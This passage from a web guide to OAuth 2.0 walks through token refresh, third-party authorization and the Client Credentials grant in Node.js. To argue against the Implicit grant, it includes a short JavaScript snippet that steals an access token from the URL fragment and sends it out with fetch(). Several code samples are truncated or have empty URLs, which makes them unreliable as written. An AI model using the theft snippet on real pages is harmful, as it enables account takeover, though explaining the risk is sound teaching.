This code stores the tokens in the server-side session and redirects the user. Now, each time the browser makes a request to the TWGTL backend, the server side code can access tokens from the session.
Let’s update our API code from above to use the server side sessions instead of the cookies:
common.authorizationCheck = async (req, res) => { const accessToken = req.session.accessToken; if (!accessToken) { return false; } try { let jwt = await common.parseJWT(accessToken); return true; } catch (err) { console.log(err); return false; } }
The only difference in this code is how we get the access token. Above the cookies provided it, and here the session does. Everything else is exactly the same.
Refreshing the access token
Finally, we need to update our code to handle refreshing the access token. The client, in this case a browser, is the right place to know when a request fails. It could fail for any number of reasons, such as network connectivity issues. But it might also fail because the access token has expired. In the browser code, we should check for errors and attempt to refresh the token if the failure was due to expiration.
Here’s the updated browser code. We are assuming the tokens are stored in cookies here.
buildAttemptRefresh is a function that returns an error handling function. We use this construct so we can attempt a refresh any time we call the API. The
after function is what will be called if the refresh attempt is successful. If the refresh attempt fails, we send the user back to the home page for reauthentication.
const buildAttemptRefresh = function(after) { return (error) => { axios.post('/refresh', {}) .then(function (response) { after(); }) .catch(function (error) { console.log("unable to refresh tokens"); console.log(error); window.location.href="/"; }); }; } // extract this to a function so we can pass it in as the 'after' parameter const getTodos = function() { axios.get('/api/todos') .then(function (response) { buildUI(response.data); buildClickHandler(); }) .catch(console.log); } axios.get('/api/todos') .then(function (response) { buildUI(response.data); buildClickHandler(); }) .catch(buildAttemptRefresh(getTodos)); function buildUI(data) { // build our UI based on the todos } function buildClickHandler() { // post to API when ToDo is done }
Since the
refresh_token is an HTTPOnly cookie, JavaScript can’t call a refresh endpoint to get a new access token. Our client side JavaScript would have to have access to the refresh token value to do so, but we don’t allow that because of cross site scripting concerns. Instead, the client calls a server-side route, which will then try to refresh the tokens using the cookie value; it has access to that value. After that, the server will send down the new values as cookies, and the browser code can retry the API calls.
Here’s the
refresh server side route, which accesses the refresh token and tries to, well, refresh the access and id tokens.
router.post('/refresh', async (req, res, next) => { const refreshToken = req.cookies.refresh_token; if (!refreshToken) { res.sendStatus(403); return; } try { const refreshedTokens = await common.refreshJWTs(refreshToken); const newAccessToken = refreshedTokens.accessToken; const newIdToken = refreshedTokens.idToken; // update our cookies console.log("updating our cookies"); res.cookie('access_token', newAccessToken, {httpOnly: true, secure: true}); res.cookie('id_token', newIdToken); // Not httpOnly or secure res.sendStatus(200); return; } catch (error) { console.log("unable to refresh"); res.sendStatus(403); return; } }); module.exports = router;
Here’s the
refreshJWT code which actually performs the token refresh:
common.refreshJWTs = async (refreshToken) => { console.log("refreshing."); // POST refresh request to Token endpoint const form = new FormData(); form.append('client_id', clientId); form.append('grant_type', 'refresh_token'); form.append('refresh_token', refreshToken); const authValue = 'Basic ' + Buffer.from(clientId +":"+clientSecret).toString('base64'); const response = await axios.post('', form, { headers: { 'Authorization' : authValue, ...form.getHeaders() } }); const accessToken = response.data.access_token; const idToken = response.data.id_token; const refreshedTokens = {}; refreshedTokens.accessToken = accessToken; refreshedTokens.idToken = idToken; return refreshedTokens; }
By default, FusionAuth requires authenticated requests to the refresh token endpoint. In this case, the
authValue string is a correctly formatted authentication request. Your OAuth server may have different requirements, so check your documentation.
Third-party login and registration (also Enterprise login and registration) with the Authorization Code grant
In the previous section we covered the Local login and registration process where the user is logging into our TWGTL application using an OAuth server we control such as FusionAuth. The other method that users can log in with is a third-party provider such as Facebook or an Enterprise system such as Active Directory. This process uses OAuth in the same way we described above.
Some third-party providers have hidden some of the complexity from us by providing simple JavaScript libraries that handle the entire OAuth workflow (Facebook for example). We won’t cover these types of third-party systems and instead focus on traditional OAuth workflows.
In most cases, the third-party OAuth server is acting in the same way as our local OAuth server. In the end, the result is that we receive tokens that we can use to make API calls to the third party. Let’s update our
handleTokens code to call an fictitious API to retrieve the user’s friend list from the third party. Here we are using sessions to store the access token and other tokens.
const axios = require('axios'); const FormData = require('form; // Call the third-party API axios.post('', form, { headers: { 'Authorization' : 'Bearer '+accessToken } }) .then((response) => { if (response.status == 200) { const json = JSON.parse(response.data); req.session.friends = json.friends; // Optionally store the friends list in our database storeFriends(req, json.friends); } }); // Redirect to the To-do list res.redirect('/todos', 302); }
This is an example of using the access token we received from the third-party OAuth server to call an API.
If you are implementing the Third-party login and registration mode without leveraging an OAuth server like FusionAuth, there are a couple of things to consider:
- Do you want your sessions to be the same duration as the third-party system?
- In most cases, if you implement Third-party login and registration as outlined, your users will be logged into your application for as long as the access and refresh tokens from the third-party system are valid.
- You can change this behavior by setting cookie or server-side session expiration times you create to store the tokens.
- Do you need to reconcile the user’s information and store it in your own database?
- You might need to call an API in the third-party system to fetch the user’s information and store it in your database. This is out of scope of this guide, but something to consider.
If you use an OAuth server such as FusionAuth to manage your users and provide Local login and registration, it will often handle both of these items for you with little configuration and no additional coding.
Third-party authorization with the Authorization Code grant
The last mode we will cover as part of the Authorization Code grant workflow is the Third-party authorization mode. For the user, this mode is the same as those above, but it requires slightly different handling of the tokens received after login. Typically with this mode, the tokens we receive from the third party need to be stored in our database because we will be making additional API calls on behalf of the user to the third party. These calls may happen long after the user has logged out of our application.
In our example, we wanted to leverage the WUPHF API to send a WUPHF when the user completes a ToDo. In order to accomplish this, we need to store the access and refresh tokens we received from WUPHF in our database. Then, when the user completes a ToDo, we can send the WUPHF.
First, let’s update the
handleTokens function to store the tokens in the database:
function handleTokens(accessToken, idToken, refreshToken, req, res) { // ... // Save the tokens to the database storeTokens(accessToken, refreshToken); // ... }
Now the tokens are safely stored in our database, we can retrieve them in our ToDo completion API endpoint and send the WUPHF. Here is some pseudo-code that implements this feature:
const axios = require('axios'); // This is invoked like: router.post('/api/todos/complete/:id', function(req, res, next) { common.authorizationCheck(req, res).then((authorized) => { if (!authorized) { res.sendStatus(403); return; } // First, complete the ToDo by id const idToUpdate = parseInt(req.params.id); common.completeTodo(idToUpdate); // Next, load the access and refresh token from the database const wuphfTokens = loadWUPHFTokens(user); // Finally, call the API axios.post('', {}, { headers: { auth: { 'bearer': wuphfTokens.accessToken, 'refresh': wuphfTokens.refreshToken } } }).then((response) => { // check for status, log if not 200 } ); }); // return all the todos const todos = common.getTodos(); res.setHeader('Content-Type', 'application/json'); res.end(JSON.stringify(todos)); }); });
This code is just an example of how we might leverage the access and refresh tokens to call third-party APIs on behalf of the user. While this was a synchronous call, the code could also post asynchronously. For example, you could add a TWGTL feature to post all of the day’s accomplishments to WUPHF every night, and the user would not have to be present, since the tokens are in the database.
First-party login and registration and first-party service authorization
These scenarios won’t be illustrated in this guide. But, the short version is:
- First-party login and registration should be handled by an OAuth server.
- First-party service authorization should use tokens generated by an OAuth server. These tokens should be presented to APIs written by the same party.
Implicit grant in OAuth 2.0
The next grant that is defined in the OAuth 2.0 specification is the Implicit grant. If this were a normal guide, we would cover this grant in detail the same way we covered the Authorization Code grant. Except, I’m not going to. :)
Please don’t use the Implicit grant.
The reason we won’t cover the Implicit grant in detail is that it is horribly insecure, broken, deprecated, and should never, ever be used (ever). Okay, maybe that’s being a bit dramatic, but please don’t use this grant. Instead of showing you how to use it, let’s discuss why you should not.
The Implicit grant has been removed from OAuth as of the most recent version of the OAuth 2.1 draft specification. to your application server with an authorization code. Instead, it puts the access token directly on the URL as part of the redirect. These URLs look like this:
The token is added to the redirect URL after the
# symbol, which means it is technically the fragment portion of the URL. What this really means is that wherever the OAuth server redirects the browser to, the access token is accessible to basically everyone.
Specifically, the access token is accessible to any and all JavaScript running in the browser. page includes 2 JavaScript libraries:
- The code for the application itself:
my-spa-code-1.0.0.js
- A library we found online that did something cool we needed and we pulled in:
a-library-found-online-that-looked-cool-0.42.0.js
Let’s assume that our code is 100% secure and we don’t have to worry about it. The issue here is that the library we pulled in is an unknown quantity. It might include other libraries as well. Remember that the DOM is dynamic. Any JavaScript can load any other JavaScript library simply by updating the DOM with more
<script> tags. Therefore, we have very little chance of ensuring that every other line of code from third-party libraries is secure.
If a third-party library wanted to steal an access token from our dummy application, all it would need to do is run this code:
if (window.location.hash.contains('access_token')) { fetch('' + window.location.hash); }
Three lines of code and the access token has been stolen. The application at can save these off, call the
login.twgtl.com to verify the tokens are useful, and then can call APIs and other resources presenting the
access_token. Oops.
As you can see, the risk of leaking tokens is far too high to ever consider using the Implicit grant. This is why we recommend that no one ever use this grant.
If you aren’t dissuaded by the above example and you really need to use the Implicit grant, please check out our documentation, which walks you through how to implement it.
Resource Owner’s Password Credentials grant
The next grant on our list is the Resource Owner’s Password Credentials grant. That’s a lot of typing, so I’m going to refer to this as the Password grant for this section.
This grant is also being deprecated and the current recommendation is that it should not be used. Let’s discuss how this grant works and why it is being deprecated.
The Password grant allows an application to collect the username and password directly from the user via a native form and send this information to the OAuth server. The OAuth server verifies this information and then returns an access token and optionally a refresh token.
Many mobile applications and legacy web applications use this grant because they want to present the user with a login UI that feels native to their application. In most cases, mobile applications don’t want to open a web browser to log users in and web applications want to keep the user in their UI rather than redirecting the browser to the OAuth server.
There are two main issues with this approach:
- The application is collecting the username and password and sending it to the OAuth server. This means that the application must ensure that the username and password are kept completely secure. This differs from the Authorization Code grant where the username and password are only provided directly to the OAuth server.
- This grant does not support any of the auxiliary security features that your OAuth server may provide such as:
- Multi-factor authentication
- Password resets
- Device grants
- Passwordless login
Due to how limiting and insecure this grant is, it has been removed from the latest draft of the OAuth specification. It is recommended to not use it in production.
If you aren’t dissuaded by the above problems and you really need it, please check out our documentation, which walks you through how to use this grant.
Client Credentials grant
The Client Credentials grant provides the ability for one
client to authorize another
client. In OAuth terms, a
client is an application itself, independent of a user. Therefore, this grant is most commonly used to allow one application to call another application, often via APIs. This grant therefore implements the Machine-to-machine authorization mode described above.
With the Client Credentials grant, there is no user to log in.
The Client Credentials grant leverages the Token endpoint of the OAuth server and sends in a couple of parameters as form data in order to generate access tokens. These access tokens are then used to call APIs. Here are the parameters needed for this grant:
client_id- this is client id that identifies the source application.
client_secret- this is a secret key that is provided by the OAuth server. This should never be made public and should only ever be stored on the source application server.
grant_type- this will always be the value
client_credentialsto let the OAuth server know we are using the Client Credentials grant.
You can send the
client_id and
client_secret in the request body or you can send them in using Basic access authorization in the
Authorization header. We’ll send them in the body below to keep things consistent with the code from the Authorization Code grant above.
Let’s rework our TWGTL application to use the Client Credentials grant in order to support two different backends making APIs calls to each other. If you recall from above, our code that completed a TWGTL ToDo item also sent out a WUPHF. This was all inline but could have been separated out into different backends or microservices. I hear microservices are hot right now.
Let’s update our code to move the WUPHF call into a separate service:
router.post('/api/todo/complete/:id', function(req, res, next) { // Verify the user is logged in const user = authorizeUser(req); // First, complete the ToDo by id const todo = todoService.complete(req.params.id, user); sendWUPHF(todo.title, user.id); }); function sendWUPHF(title, userId) { const accessToken = getAccessToken(); // Coming soon const body = { 'title': title, 'userId': userId } axios.post('', body, { headers: { auth: { 'bearer': accessToken } } }).then((response) => { res.sendStatus(200); }).catch((err) => { console.log(err); res.sendStatus(500); }); });
Here is the WUPHF microservice code that receives the access token and title of the WUPHF and sends it out:
const express = require('express'); const router = express.Router(); const bearerToken = require('express-bearer-token'); const request = require('request'); const clientId = '9b893c2a-4689-41f8-91e0-aecad306ecb6'; const clientSecret = 'setec-astronomy'; var app = express(); app.use(express.json()); app.use(bearerToken()); app.use(express.urlencoded({extended: false})); router.post('/send', function(req, res, next) { const accessAllowed = verifyAccessToken(req); // Coming soon if (!accessAllowed) { res.sendStatus(403); return; } // Load the access and refresh token from the database (based on the userId) const wuphfTokens = loadWUPHFTokens(req.data.userId); // Finally, call the API axios.post('', {message: 'I just did a thing: '+req.data.title}, { headers: { auth: { 'bearer': wuphfTokens.accessToken, 'refresh': wuphfTokens.refreshToken } } }).then((response) => { res.sendStatus(200); }).catch((err) => { console.log(err); res.sendStatus(500); }); });
We’ve now separated the code that is responsible for completing ToDos from the code that sends the WUPHF. The only thing left to do is hook this code up to our OAuth server in order to generate access tokens and verify them.
Because this is machine to machine communication, the user’s access tokens are irrelevant. We don’t care if the user has permissions to call the WUPHF microservice. Instead, the Todo API will authenticate against
login.twgtl.com and receive an access token for its own use.
Here’s the code that generates the access token using the Client Credentials grant:
const clientId = '82e0135d-a970-4286-b663-2147c17589fd'; const clientSecret = 'setec-astronomy'; function getAccessToken() { // POST request to Token endpoint const form = new FormData(); form.append('client_id', clientId); form.append('client_secret', clientSecret) form.append('grant_type', 'client_credentials'); axios.post('', form, { headers: form.getHeaders() }) .then((response) => { return response.data.access_token; }).catch((err) => { console.log(err); return null; }); }
In order to verify the access token in the WUPHF microservice, we will use the Introspect endpoint. As discussed above, the Introspect endpoint takes an access token, verifies it, and then returns any claims associated with the access token. In our case, we are only using this endpoint to ensure the access token is valid. Here is the code that verifies the access token:
const axios = require('axios'); const FormData = require('form-data'); function verifyAccessToken(req) { const form = new FormData(); form.append('token', accessToken); form.append('client_id', clientId); try { const response = await axios.post('', form, { headers: form.getHeaders() }); if (response.status === 200) { return response.data.active; } } catch (err) { console.log(err); return false; } }
With the Client Credentials grant, there is no user to log in. Instead, the
clientId and
clientSecret act as a username and password, respectively, for the entity trying to obtain an access token.
Device grant
This grant is our final grant to cover. This grant type allows us to use the Device login and registration mode. As mentioned above, we cover this mode and the Device grant in detail in our OAuth Device Authorization article.
Conclusion
I hope this guide has been a useful overview of the real-world uses of OAuth 2.0 and provided insights into implementation and the future of the OAuth protocol. Again, you can view working code in this guide in the accompanying GitHub repository.
If you notice any issues, bugs, or typos in the Modern Guide to OAuth, please submit a Github issue or pull request on this repository.
Thanks for reading and happy coding!
|
https://fusionauth.io/learn/expert-advice/oauth/modern-guide-to-oauth/
|
CC-MAIN-2022-05
|
refinedweb
| 13,377
| 56.25
|
Here's a small snippet from my code. Following a Knuth Shuffle model in the Shuffle function, I get 6 Pointer Expected errors in line 15, but I'm sure its really 2 due to the SWAP function in the header. Now the two things I'm swapping are a random index and the i-1 index from the same character array. I'm just confused why a character array isn't being recognized as a pointer already.
#include <stdlib.h> #include <string.h> #define SWAP(a,b) {a^=b;b^=a;a^=b;} #define MAX 60 #define MIN 10 int i; char input[MAX]; int shuffle (char input) { for (i=strlen(&input); i>1; i--) { SWAP(input[i-1], input[rand()%i]); // <- This is where the 6 (or 2) Pointer Expectations occur } } int main (void) { printf("Please enter a string greater than 10 letters: \n"); scanf(" %s", &input); printf("You entered:\n"); printf("%s\n", input); printf("Here's your shuffled string:\n"); printf("%d\n", shuffle(*input)); return 0; }
|
https://www.daniweb.com/programming/software-development/threads/418587/persistent-pointer-expected-error
|
CC-MAIN-2018-30
|
refinedweb
| 171
| 56.89
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.